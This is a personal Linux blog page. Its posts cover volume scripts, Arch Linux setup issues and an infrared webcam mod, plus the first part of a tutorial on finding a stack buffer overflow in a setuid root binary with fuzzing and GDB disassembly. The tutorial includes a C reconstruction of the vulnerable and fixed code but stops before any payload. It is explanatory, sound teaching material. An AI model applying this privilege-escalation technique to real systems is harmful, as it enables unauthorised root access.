<b>mmap() to null</b>: thoughts on open source, security or anything interesting... (sandm4n)

<b>It's 2016!</b> (2016-03-14)<div dir="ltr" style="text-align: left;" trbidi="on">
It's been more than 2 years since my last post. Life has been colorful meanwhile, and I plan on making a return. This post is just a heartbeat to let people know that I am still alive.</div>
<b>Counterstrike Server lookup in python</b> (2013-10-15)<div dir="ltr" style="text-align: left;" trbidi="on">
Wrote this script in my leisure time a long time ago to look up Counterstrike servers on my college network. Designed for CZERO; modification required for version 1.6. Enjoy and edit as per need.
<iframe src="http://pastebin.com/embed_iframe.php?i=cM9S11V8" style="border:none;width:100%;height:500px"></iframe>
</div>
<b>Travels from the prison of $ to the realm of # [PART 1]</b> (2013-04-16)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><span style="font-size: small;">Beginning Notes: </span></b><br />
<b>1. A modest amount of core knowledge is assumed.</b><br />
<b>2. A read of "Smashing The Stack for Fun and Profit" by Aleph One is recommended.</b><br />
<b>3. Point '2' doesn't guarantee anything; for further queries refer to point '1' or ask away in the comments.</b><br />
<br />
To get the <b>#</b> symbol at a console is a local exploit's dream. But in the current privileged land of <b>root</b>, it is not uncommon to face challenges. Let's take a simple example: <b>a setuid root binary</b> that reads data from a file and echoes it onto stdout. Let's make this a little easier: the binary is <b>not stripped</b>. Let's make this even easier: <b>ASLR & Stack Cookies</b> are <b>disabled</b>... <b>for now</b>. At the same time, it's a 64 bit system, NX is enabled [Hardware Enforced] & we don't have the source code.<br />
<br />
Enough talking, let's get our hands dirty...<br />
<br />
A sample run:<br />
<br />
<span style="font-size: x-small;">$> ./test<br />usage: ./test file_name<br />$> echo "hello" > foo<br />$> ./test foo<br />Data Read: hello</span><br />
<br />
Looks good: the program takes a filename as input, reads the file and echoes its contents on stdout.<br />
<br />
Let's try to spice it up a bit and run the program with input incremented by 100 characters each time.<br />
For the character stream generation, we shall use good ol' python.<br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*100" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]<br /> <br />$> python -c "print 'A'*200" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<span style="font-size: x-small;"><br />$> python -c "print 'A'*300" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<br />
Seems good till now; maybe the code isn't vulnerable, but that wouldn't be fun, would it ;)<br />
Let's keep trying...<br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*400" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]</span><br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*500" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]</span><br />
Maybe this is a lost cause; we might as well go and check our email...<br />
"<i>Patience my padawan learner</i>" <br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*600" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<span style="font-size: x-small;">Segmentation Fault (core dumped)</span><br />
<br />
Bullseye! A segfault: the buffer doesn't seem to be unlimited after all.<br />
Looking at all the attempts, we can say that the buffer limit lies somewhere between 500 and 600 bytes.<br />
<br />
Let's fire up GDB for a bit of code and stack analysis.<br />
<span style="font-size: x-small;"><br />$> gdb test<br />GNU gdb (GDB) 7.2<br />Copyright (C) 2010 Free Software Foundation, Inc.<br />License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;<br />This is free software: you are free to change and redistribute it.<br />There is NO WARRANTY, to the extent permitted by law. Type "show copying"<br />and "show warranty" for details.<br />This GDB was configured as "x86_64-unknown-linux-gnu".<br />For bug reporting instructions, please see:<br />&lt;http://www.gnu.org/software/gdb/bugs/&gt;...<br />Reading symbols from /home/sandman/test...(no debugging symbols found)...done.<br />(gdb) run foo<br />Starting program: /home/sandman/test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00000000004007af in echo_me ()</span><br />
Seems like the code segfaults in the function echo_me(), a little bit of disassembly required (thankfully the binary is not stripped)...<br />
<br />
<span style="font-size: x-small;">(gdb) disas echo_me<br />
Dump of assembler code for function echo_me:<br />
 0x00000000004006d4 <+0>: push %rbp<br />
 0x00000000004006d5 <+1>: mov %rsp,%rbp<br />
 0x00000000004006d8 <+4>: sub $0x240,%rsp<br />
 0x00000000004006df <+11>: mov %rdi,-0x238(%rbp)<br />
 0x00000000004006e6 <+18>: mov $0x4008ec,%edx<br />
 0x00000000004006eb <+23>: mov -0x238(%rbp),%rax<br />
 0x00000000004006f2 <+30>: mov %rdx,%rsi<br />
 0x00000000004006f5 <+33>: mov %rax,%rdi<br />
 0x00000000004006f8 <+36>: callq 0x4005b0 &lt;fopen@plt&gt;<br />
 0x00000000004006fd <+41>: mov %rax,0x20053c(%rip) # 0x600c40 &lt;fp&gt;<br />
 0x0000000000400704 <+48>: mov 0x200535(%rip),%rax # 0x600c40 &lt;fp&gt;<br />
 0x000000000040070b <+55>: test %rax,%rax<br />
 0x000000000040070e <+58>: jne 0x400724 &lt;echo_me+80&gt;<br />
 0x0000000000400710 <+60>: mov $0x4008ee,%edi<br />
 0x0000000000400715 <+65>: callq 0x400580 &lt;puts@plt&gt;<br />
 0x000000000040071a <+70>: mov $0xffffffff,%edi<br />
 0x000000000040071f <+75>: callq 0x4005a0 &lt;exit@plt&gt;<br />
 0x0000000000400724 <+80>: mov 0x200515(%rip),%rax # 0x600c40 &lt;fp&gt;<br />
 0x000000000040072b <+87>: mov $0x2,%edx<br />
 0x0000000000400730 <+92>: mov $0x0,%esi<br />
 0x0000000000400735 <+97>: mov %rax,%rdi<br />
 0x0000000000400738 <+100>: callq 0x400590 &lt;fseek@plt&gt;<br />
 0x000000000040073d <+105>: mov 0x2004fc(%rip),%rax # 0x600c40 &lt;fp&gt;<br />
 0x0000000000400744 <+112>: mov %rax,%rdi<br />
 0x0000000000400747 <+115>: callq 0x400570 &lt;ftell@plt&gt;<br />
 0x000000000040074c <+120>: mov %eax,-0x4(%rbp)<br />
 0x000000000040074f <+123>: mov 0x2004ea(%rip),%rax # 0x600c40 &lt;fp&gt;<br />
 0x0000000000400756 <+130>: mov $0x0,%edx<br />
 0x000000000040075b <+135>: mov $0x0,%esi<br />
 0x0000000000400760 <+140>: mov %rax,%rdi<br />
 0x0000000000400763 <+143>: callq 0x400590 &lt;fseek@plt&gt;<br />
 0x0000000000400768 <+148>: mov 0x2004d1(%rip),%rdx # 0x600c40 &lt;fp&gt;<br />
 0x000000000040076f <+155>: mov -0x4(%rbp),%ecx<br />
 0x0000000000400772 <+158>: lea -0x230(%rbp),%rax<br />
 0x0000000000400779 <+165>: mov %ecx,%esi<br />
 0x000000000040077b <+167>: mov %rax,%rdi<br />
 0x000000000040077e <+170>: callq 0x4005d0 &lt;fgets@plt&gt;<br />
 0x0000000000400783 <+175>: mov 0x2004b6(%rip),%rax # 0x600c40 &lt;fp&gt;<br />
 0x000000000040078a <+182>: mov %rax,%rdi<br />
 0x000000000040078d <+185>: callq 0x4005e0 &lt;fclose@plt&gt;<br />
 0x0000000000400792 <+190>: mov $0x4008fa,%eax<br />
 0x0000000000400797 <+195>: lea -0x230(%rbp),%rdx<br />
 0x000000000040079e <+202>: mov %rdx,%rsi<br />
 0x00000000004007a1 <+205>: mov %rax,%rdi<br />
 0x00000000004007a4 <+208>: mov $0x0,%eax<br />
 0x00000000004007a9 <+213>: callq 0x400560 &lt;printf@plt&gt;<br />
 0x00000000004007ae <+218>: leaveq<br />
=> 0x00000000004007af <+219>: retq<br />
End of assembler dump.<br />
(gdb)</span><br />
<br />
Looking at the disassembly, it's quite easy to get an idea of the code by simply following the important @plt [procedure linkage table] calls...<br />
<br />
<span style="font-size: x-small;">function echo_me(){<br /> fopen(file) | open the file<br /> fseek(till EOF) --|<br /> ftell(file_des) |--> to calculate the length of the file<br /> fseek(till BOF) --| <br /> fgets(the string from the file) | get the string from the file and store it in the buffer [the vulnerability lies here]<br /> fclose(file) | close the file<br /> printf(the string) | print the string<br />}</span><br />
<br />
Looking at all this, it is evident what the programmer did: a buffer with a static size was defined, the file size was calculated, and the file was read into the buffer using that size. Finally, the buffer is displayed as the output.</div>
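To make the pattern from the disassembly concrete, here is an added C example (my own reconstruction, not the source of the test binary, which the post does not have) that models the fgets call: the 0x230-byte local buffer, the read length taken from ftell, and the bounded form that removes the bug. BUF_SIZE, make_input and the other helper names are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 0x230 = 560 bytes: the local buffer at -0x230(%rbp) in the disassembly.
 * The saved %rbp and the return address sit right after it on the stack,
 * so anything written past byte 560 lands on them. */
#define BUF_SIZE 0x230

/* File length the way echo_me computes it: seek to the end, ftell, seek back. */
long file_length(FILE *fp)
{
    if (fseek(fp, 0, SEEK_END) != 0) return -1;
    long len = ftell(fp);
    if (fseek(fp, 0, SEEK_SET) != 0) return -1;
    return len;
}

/* How many bytes fgets(buf, n, fp) may store: up to n - 1 characters plus
 * the terminating NUL, i.e. n bytes. In echo_me, n is the file length. */
size_t vulnerable_write_size(long file_len)
{
    return file_len > 0 ? (size_t)file_len : 0;
}

/* True when a file of file_len bytes lets the original fgets call write
 * past the 560-byte buffer: the 601-byte "foo" (600 'A' plus newline) does,
 * the 501-byte one does not, which is the 500..600 bracket found above. */
int overflows_buffer(long file_len)
{
    return vulnerable_write_size(file_len) > BUF_SIZE;
}

/* The shape of echo_me as reconstructed from the disassembly: the read
 * length comes from the file, not from the buffer. Kept for comparison
 * only; it is undefined behaviour on input of BUF_SIZE bytes or more. */
size_t echo_me_vulnerable(FILE *fp, FILE *out)
{
    char buf[BUF_SIZE];
    long len = file_length(fp);
    if (len <= 0) return 0;
    if (!fgets(buf, (int)len, fp)) return 0;
    if (out) fprintf(out, "Data Read: %s\n", buf);
    return strlen(buf);
}

/* Hardened form: the bound is the buffer size, so a long file is truncated
 * to BUF_SIZE - 1 characters instead of overwriting the saved frame. */
size_t echo_me_fixed(FILE *fp, FILE *out)
{
    char buf[BUF_SIZE];
    if (!fgets(buf, (int)sizeof buf, fp)) return 0;
    buf[strcspn(buf, "\n")] = '\0';   /* drop the newline python's print added */
    if (out) fprintf(out, "Data Read: %s\n", buf);
    return strlen(buf);
}

/* Constructed input: n copies of 'A' and a newline, the same shape as
 * python -c "print 'A'*n" > foo, kept in a temporary file. */
FILE *make_input(size_t n)
{
    FILE *fp = tmpfile();
    if (!fp) return NULL;
    for (size_t i = 0; i < n; i++) fputc('A', fp);
    fputc('\n', fp);
    rewind(fp);
    return fp;
}

/* Characters the hardened echo_me stores for an input of n 'A's. */
size_t fixed_result_for(size_t n)
{
    FILE *fp = make_input(n);
    if (!fp) return 0;
    size_t got = echo_me_fixed(fp, NULL);
    fclose(fp);
    return got;
}

/* Same for the original shape, refusing inputs that would overflow. */
size_t vulnerable_result_for(size_t n)
{
    if (overflows_buffer((long)n + 1)) return (size_t)-1;
    FILE *fp = make_input(n);
    if (!fp) return 0;
    size_t got = echo_me_vulnerable(fp, NULL);
    fclose(fp);
    return got;
}

int main(void)
{
    for (long n = 100; n <= 600; n += 100) {
        long len = n + 1;   /* 'A' * n plus the trailing newline */
        printf("%ld-byte foo: fgets may store %zu bytes in a %d-byte buffer -> %s\n",
               len, vulnerable_write_size(len), BUF_SIZE,
               overflows_buffer(len) ? "overflow" : "fits");
    }
    printf("hardened echo_me on 600 'A's stored %zu characters\n", fixed_result_for(600));
    return 0;
}
```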
<b>amixer vs alsamixer: Master channel</b> (2013-02-12)<div dir="ltr" style="text-align: left;" trbidi="on">
A convenient method to change the Master volume that I use is a custom KISS bash script that essentially calls <b>amixer</b>. One curious observation I made was that the value reported by amixer for the Master channel did not correlate with <b>alsamixer</b>. A little research reveals why:<br />
<br />
from the alsa-devel mailing list:<br />
<br />
<span style="font-size: small;"><i>The percentage in amixer has nothing to do with dB level. <br />It's just the percentage of the raw value range of that mixer <br />element. Thus showing 89% is correct. It's 10% down from 100% <br />(1% is because of the resolution of the raw values). </i></span><br />
<span style="font-size: small;"><i><br /></i></span>
<span style="font-size: small;"><i>Now, alsamixer shows the percentage in a different way. It's <br />explained well in the source code (alsamixer/volume_mapping.c), but <br />not mentioned in the man page, unfortunately.</i></span><br />
<span style="font-size: small;"><i>* The mapping is designed so that the position in the interval is proportional <br />* to the volume as a human ear would perceive it (i.e., the position is the <br />* cubic root of the linear sample multiplication factor). For controls with <br />* a small range (24 dB or less), the mapping is linear in the dB values so <br />* that each step has the same size visually. Only for controls without dB <br />* information, a linear mapping of the hardware volume register values is used <br />* (this is the same algorithm as used in the old alsamixer).</i></span><br />
<span style="font-size: small;"><i>The percentage representation in alsamixer corresponds to this <br />mapping, thus it's neither dB nor linear percent.</i></span><br />
<br />
<span style="font-size: x-small;"><span style="font-size: small;">Original discussion is here:</span></span><br />
<span style="font-size: x-small;"><i><a href="http://mailman.alsa-project.org/pipermail/alsa-devel/2012-March/050146.html" rel="nofollow" target="_blank">http://mailman.alsa-project.org/pipermail/alsa-devel/2012-March/050146.html</a></i></span><br />
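To see the two scales side by side, here is an added C example (my own, not code from alsa-utils) that computes amixer's raw-range percentage and alsamixer's mapping following get_normalized_volume() in volume_mapping.c. The 0..87 raw range with exactly 1 dB per step is a constructed control, not read from a card, and exp10 is implemented inline so the file builds without libm.

```c
#include <stdio.h>

/* Same threshold and mute sentinel as alsa-utils' alsamixer/volume_mapping.c
 * and alsa-lib's tlv.h; all dB values are in 1/100 dB, as ALSA reports them. */
#define MAX_LINEAR_DB_SCALE 24
#define DB_GAIN_MUTE (-9999999)

/* e^x without libm: halve the argument until it is small, sum a short
 * Taylor series, then square the result back up. */
static double exp_nolibm(double x)
{
    int halvings = 0;
    while (x > 0.5 || x < -0.5) { x *= 0.5; halvings++; }
    double sum = 1.0, term = 1.0;
    for (int i = 1; i < 24; i++) { term *= x / i; sum += term; }
    while (halvings-- > 0) sum *= sum;
    return sum;
}

/* 10^x, the exp10() that volume_mapping.c uses. */
static double exp10_nolibm(double x)
{
    return exp_nolibm(x * 2.302585092994046);   /* ln(10) */
}

/* amixer's percentage: position in the raw register range, nothing to do with dB. */
double amixer_fraction(long raw, long raw_min, long raw_max)
{
    if (raw_max == raw_min) return 0.0;
    return (double)(raw - raw_min) / (double)(raw_max - raw_min);
}

/* alsamixer's percentage: linear in dB for ranges of 24 dB or less,
 * otherwise the cube root of the linear amplitude factor (10^(dB/60)),
 * rescaled so the bottom of the range maps to 0 unless the bottom is the
 * mute sentinel. */
double alsamixer_fraction(long value_db, long min_db, long max_db)
{
    if (min_db >= max_db) return 0.0;
    if (max_db - min_db <= MAX_LINEAR_DB_SCALE * 100)
        return (double)(value_db - min_db) / (double)(max_db - min_db);
    double normalized = exp10_nolibm((double)(value_db - max_db) / 6000.0);
    if (min_db != DB_GAIN_MUTE) {
        double min_norm = exp10_nolibm((double)(min_db - max_db) / 6000.0);
        normalized = (normalized - min_norm) / (1.0 - min_norm);
    }
    return normalized;
}

/* Constructed control for the demo (an assumption, not a real card's table):
 * raw steps 0..87, each step exactly 1 dB, so raw 87 is 0 dB and raw 0 is -87 dB. */
#define RAW_MIN 0
#define RAW_MAX 87
long raw_to_db(long raw) { return (raw - RAW_MAX) * 100; }

int main(void)
{
    printf("raw  amixer%%  alsamixer%%\n");
    for (long raw = RAW_MAX; raw >= RAW_MIN; raw -= 9) {
        double a = amixer_fraction(raw, RAW_MIN, RAW_MAX);
        double m = alsamixer_fraction(raw_to_db(raw), raw_to_db(RAW_MIN), raw_to_db(RAW_MAX));
        printf("%3ld  %6.0f   %9.0f\n", raw, a * 100.0, m * 100.0);
    }
    return 0;
}
```

With this control, raw step 78 shows as about 90% in amixer but about 70% in alsamixer, which is the kind of mismatch the script's notification exposes.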
<br />
<span style="font-size: small;">The script itself:</span><br />
<br />
<b><span style="font-size: x-small;">#!/bin/bash<br />## Amixer script: 1 = volume up, 2 = volume down, 0 = toggle mute (disabled).<br />[ $# -eq 1 ] || { echo "usage: $0 1|2"; exit 1; }<br /><br />if [ "$1" -eq 1 ]<br />then<br /> amixer set Master 5%+<br /> notify-send "Volume Increase +5%:" "Master Volume Level: $(amixer get Master | grep Mono: | grep -o '[0-9]*%')"<br />fi<br /><br />if [ "$1" -eq 2 ]<br />then<br /> amixer set Master 5%-<br /> notify-send "Volume Decrease -5%:" "Master Volume Level: $(amixer get Master | grep Mono: | grep -o '[0-9]*%')"<br />fi<br /><br />#if [ "$1" -eq 0 ]<br />#then<br /># amixer set Master toggle<br /># notify-send "Volume Master Toggle:" "Master Volume Level: "<br />#fi</span></b><br />
<b><span style="font-size: x-small;">#EOF</span></b><br />
<span style="font-size: x-small;"><i><br /></i></span>
<span style="font-size: small;">Running with arguments 1, 2 or 0 increases, decreases or toggles (mutes) the Master channel respectively. I don't use the toggle segment, thus it's commented out.</span></div>
<b>Linux in 2013, systemd, kernel regressions etc etc...</b> (2013-02-10)<div dir="ltr" style="text-align: left;" trbidi="on">
It has been a very busy time for me, exams on one side and setting up Arch all over again on the other. Somehow I got up to 70% of the work done reinstalling, configuring, rewriting and theming, but thankfully the worst is out of the way. I know that because before I reinstalled Arch, I assumed a lot of things about the procedure from earlier experience, but the reality was close to shocking, see below.<br />
<br />
1. Arch installer removed, all steps are to be done by the user.<br />
2. Bye sysvinit! Hello systemd <br />
3. Kernel Power Regressions. !!<br />
4. HDD APM Issue. !! <br />
5. Openbox updated to 3.5<br />
6. Kernel Ver. @ 3.7.6<br />
7. Since I had newer hardware with dual GPUs [Hybrid Graphics/Optimus], I had to rewrite conky and many scripts due to many low level changes.<br />
<br />
Now I'm not saying that all of this was bad; actually, upgrades like systemd were very much welcome. Anyway, what follows is a rundown of each and what I did to counter/resolve the issues.<br />
<br />
1. Not much of an issue actually; to be honest, I liked the fact that the installer now requires the user to customize manually. It helps in optimizing the system, and as a secondary bonus the packages installed are always the latest, since the new installer "pacstrap" downloads the latest package versions instead of installing directly from the Live Media.<br />
<br />
2. This was a big surprise: whatever I knew about the original rc.conf sysvinit boot system had to be washed away and relearnt with systemd in mind. Mind you, systemd is a boon! Bootup times have been slashed due to the efficient parallelization implemented, which contrasts with the original init's sequential boot process. Also, systemd allows for a much neater boot process modification, and the entire start|stop sequence is much cleaner. Although it takes a while to get used to, once you do, creating your own service/tmpfiles becomes a breeze. Also, syslogd is now replaced with a journal which can be accessed through the systemctl command. Actually, all one needs to use is the systemctl command!<br />
<br />
3. These "issues" are actually fixed in the 3.8.x RC versions, which are yet to be tested and marked stable, but we will get there. The issues I'm talking about affect the Sandy Bridge (and possibly Ivy Bridge too!) line of CPUs. CPU frequency scaling gets locked at maximum frequency w/o turbo boost (Thank god!). In my case (2670QM) the scaling clocks were reported to be the lowest clock possible, 800 MHz, but a look at the current clocks proved that they were actually stuck at 2.2 GHz. Also, on the integrated GPU end, the RC6 (powersaving) state was not being initialized. What frustrated me further was that temperatures were 10-15 degrees (Celsius) higher than in Windows. This tends to happen randomly per boot and will be fixed once 3.8 is available as stable. Tip: If you can't wait, check the links at the end of the post for RC (Release Candidate) versions of the kernel.<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><b> #] cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq<br /> 800000<br /><br /> #] cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq<br /> 2201000</b></span><br />
<br />
4. This was the most annoying/frustrating issue I have ever had. Not because it was difficult to fix, but because of the everlasting effect it may have had on my HDD. Before I say more, understand that it's not really Linux's fault; read on. Long story short, 2.5" HDDs implement shady power saving mechanisms such as head parking and spinning down the spindle motor during an I/O idle session. Furthermore, the smart brass at WDC decided to choose power saving over HDD lifespan. They achieved this by implementing something called <a href="http://www.instantfundas.com/2011/12/intellipark-makes-western-digital-green.html" target="_blank"><u><b>intellipark</b></u></a>, which essentially parks the head whenever it senses that I/O is idling. Sometimes this is done in less than 8 seconds. What this results in is a constant "<i>clicking</i>" sound from the HDD and the slow but eventual degradation in head quality, which could lead to HDD failure. If that is not enough, the slowdown of the spindle motor puts pressure on it, because spinning the motor up for an I/O active session requires throwing in more power, not to mention stressing the motor further (Newton's first law!).<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><b>12 Power_Cycle_Count 0x0032 100 100 000 Old_age Always - 455</b></span><br />
<span style="font-size: x-small;"><b>193 Load_Cycle_Count 0x0032 155 155 000 Old_age Always - 136465</b></span><br />
<br />
Checking SMART data on the HDD showed that the current LOAD_CYCLE_COUNT (Number of parks) had jumped to 136465 in less than a year. To put this in perspective, an average 2.5" HDD has a lifetime of 300000 - 600000 parks. Way to go WDC! <br />
<br />
I would also like to add that a similar but slightly less annoying effect was also visible when running Windows 7. Thankfully Linux has a tool [hdparm] which allows modifying many variables on the HDD directly, such as the APM (Advanced Power Management) value. My original value was 96, which I then changed to 254 to basically kill all possible forms of APM. Did it work?<br />
<br />
Yes! :-)<br />
<br />
5. Not new and also not much of an issue; the openbox 3.4 config is a drop-in replacement for 3.5.<br />
<br />
6. The kernel is currently at 3.7.6, nice and fast with major fixes, but with the power regressions.<br />
<br />
7. As previously mentioned in an older post, this was somewhat of a new laptop; modifying old scripts/configs took some time. I had to scale the conky config and other scripts to take into account the i7's quad cores, plus the inclusion of NVIDIA GPU temperature monitoring thanks to the free <b>nouveau</b> driver, which enabled basic power management.<br />
<br />
Optimus is still not a fully functional component in Linux, but thanks to projects such as <b>bumblebee</b>, enabling hybrid graphics support was relatively easy.<br />
<br />
So that's pretty much it. I'm looking forward to checking out how tools such as Metasploit, Nmap etc. have improved.<br />
<br />
Any questions/comments... insults?? <br />
<br />
Ref:<br />
<br />
<u><b>Kernel Power Regressions: </b></u><br />
: <a href="https://bbs.archlinux.org/viewtopic.php?id=150743">https://bbs.archlinux.org/viewtopic.php?id=150743</a> //RC Versions in this thread<br />
: <a href="https://wiki.archlinux.org/index.php/Intel_Graphics#Module-based_Powersaving_Options" target="_blank">https://wiki.archlinux.org/index.php/Intel_Graphics#Module-based_Powersaving_Options </a><br />
<br />
<u><b>HDD APM Issue: </b></u><br />
: <a href="https://bbs.archlinux.org/viewtopic.php?id=39258">https://bbs.archlinux.org/viewtopic.php?id=39258</a><br />
: <a href="https://wiki.archlinux.org/index.php/Hdparm#Parking_your_hard_drive">https://wiki.archlinux.org/index.php/Hdparm#Parking_your_hard_drive</a><br />
: <a href="http://en.wikipedia.org/wiki/S.M.A.R.T.#ATA_S.M.A.R.T._attributes">http://en.wikipedia.org/wiki/S.M.A.R.T.#ATA_S.M.A.R.T._attributes</a><br />
: <a href="http://forums.anandtech.com/showthread.php?t=2085685">http://forums.anandtech.com/showthread.php?t=2085685</a><br />
<br />
<u><b>Systemd:</b></u><br />
: <a href="https://wiki.archlinux.org/index.php/Systemd" target="_blank">https://wiki.archlinux.org/index.php/Systemd </a></div>
<b>There and back again....</b> (2013-02-03)<div dir="ltr" style="text-align: left;" trbidi="on">
Went from Fedora > Ubuntu > Fedora > Arch > Fedora > Arch (incomplete setup) > M$ Bulldows. Been so busy lately that I haven't used Linux in 6 months! Arch is a pain to set up again (don't get me wrong, it's a great distro and my fav.) so I guess I will finally go back to where I came from.... Fedora.<br />
<br />
Current release => Fedora 18<br />
<br />
Downloading right now!<br />
<br />
EDIT: Nope... F18 sucks (check below)... thankfully I did a little research... I guess the universe wants me to stick to Arch. It's better to set things up the way you like them and not let some company or a group of people decide. <br />
<br />
Src: <a href="http://www.dedoimedo.com/computers/fedora-18-kde.html">http://www.dedoimedo.com/computers/fedora-18-kde.html</a><br />
Src2: <a href="http://linux.slashdot.org/story/13/01/23/230255/alan-cox-fedora-18-the-worst-red-hat-distro-switches-to-ubuntu">http://linux.slashdot.org/story/13/01/23/230255/alan-cox-fedora-18-the-worst-red-hat-distro-switches-to-ubuntu</a></div>
<b>Infra-Webcam Mod Part 1.</b> (2013-01-31)<div dir="ltr" style="text-align: left;" trbidi="on">
Due to a recent break-in near our apartments, the whole security infrastructure went through an overhaul. Going through all the new features, I came across one that caught my eye: Night-Vision Security Cameras. Upon further investigation, I found these were actually infrared cameras.<br />
<br />
The cameras themselves looked like webcams dotted with red LEDs. Now, I had seen them before but never wondered about their purpose or capability. A simple Google search uncovered a ton of info, and the part that totally took me by surprise was the fact that these could be engineered at home using simple everyday camera hardware.<br />
<br />
Now, I'm not gonna write down a tutorial or go much in depth but will give some insight on how I made mine.<br />
<br />
The idea is simple. A normal camera has 3 components: the lens, the IR filter and the CCD chip. All one has to do is remove the IR filter and replace it with a "visible light filter" (Hint: Kodak).<br />
<br />
Anyway, below are a few pics I took while disassembling and modding.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE5xs8uyBr7QJt2XBpAR2zXHz6RfUbr78tO39V1XkytawQKslS8L_cOUfDGojslgmqpKnBARg7IlkQ4IRwjDd7LkSvwAbHHKSDbEgorhBjwVAm1PAgCDy7goQO7qmgOIWmRooUqiCu49xx/s1600/2013-01-31+18.28.09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE5xs8uyBr7QJt2XBpAR2zXHz6RfUbr78tO39V1XkytawQKslS8L_cOUfDGojslgmqpKnBARg7IlkQ4IRwjDd7LkSvwAbHHKSDbEgorhBjwVAm1PAgCDy7goQO7qmgOIWmRooUqiCu49xx/s200/2013-01-31+18.28.09.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">The Camera (Source: Local flea market, Vendor: PC-Touch)</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtccJQsdHmi80vAvJt8cIIyL0O6VgC0TEcouS1s1IHpUTsr-uTxSnYGk2kBKCJ6eMLlXs80A_sKCx8TPZUstmgDOis_glZAdZ_l8HpcpkND-yxHspo32fTZoM6hqfLoo6M-xzd3s1ahOy-/s1600/2013-01-31+19.31.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtccJQsdHmi80vAvJt8cIIyL0O6VgC0TEcouS1s1IHpUTsr-uTxSnYGk2kBKCJ6eMLlXs80A_sKCx8TPZUstmgDOis_glZAdZ_l8HpcpkND-yxHspo32fTZoM6hqfLoo6M-xzd3s1ahOy-/s200/2013-01-31+19.31.54.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>The PCB with the Lens, IR FLTR, CCD.</i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha17a4JSv9ATYdRLq_6lHMXHxEMeMlCWQ7JdoiJnJieWI98XusmiWcooDmNxbfP_RxKAZcHVW9crA9BM0kDwGEkfYr9uC1sNHRpU8ommoVIwnzK1f6fzg5AQlgusnoEnXPQcT70lNueQeY/s1600/2013-01-31+19.33.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha17a4JSv9ATYdRLq_6lHMXHxEMeMlCWQ7JdoiJnJieWI98XusmiWcooDmNxbfP_RxKAZcHVW9crA9BM0kDwGEkfYr9uC1sNHRpU8ommoVIwnzK1f6fzg5AQlgusnoEnXPQcT70lNueQeY/s200/2013-01-31+19.33.04.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>IR Filter (Note to self: Next time take the picture before breaking the thing :-P)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEXXDPfHiPeN0a55nQC2YUo7fFONlHH9bSJ1h18xPpnCgvKMPVLl5D7ZS6XQ5hMGDxb5qI_MQPdUdEnB-SCdrSpycmDrkOcmw8uv7Stp1IiI-cMgCyLvIRXz4RTiWEYlo1tYN5g3nowzlL/s1600/2013-01-31+19.34.03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEXXDPfHiPeN0a55nQC2YUo7fFONlHH9bSJ1h18xPpnCgvKMPVLl5D7ZS6XQ5hMGDxb5qI_MQPdUdEnB-SCdrSpycmDrkOcmw8uv7Stp1IiI-cMgCyLvIRXz4RTiWEYlo1tYN5g3nowzlL/s200/2013-01-31+19.34.03.jpg" width="150" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>CCD Chip (Lens, IR FLTR removed)</i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
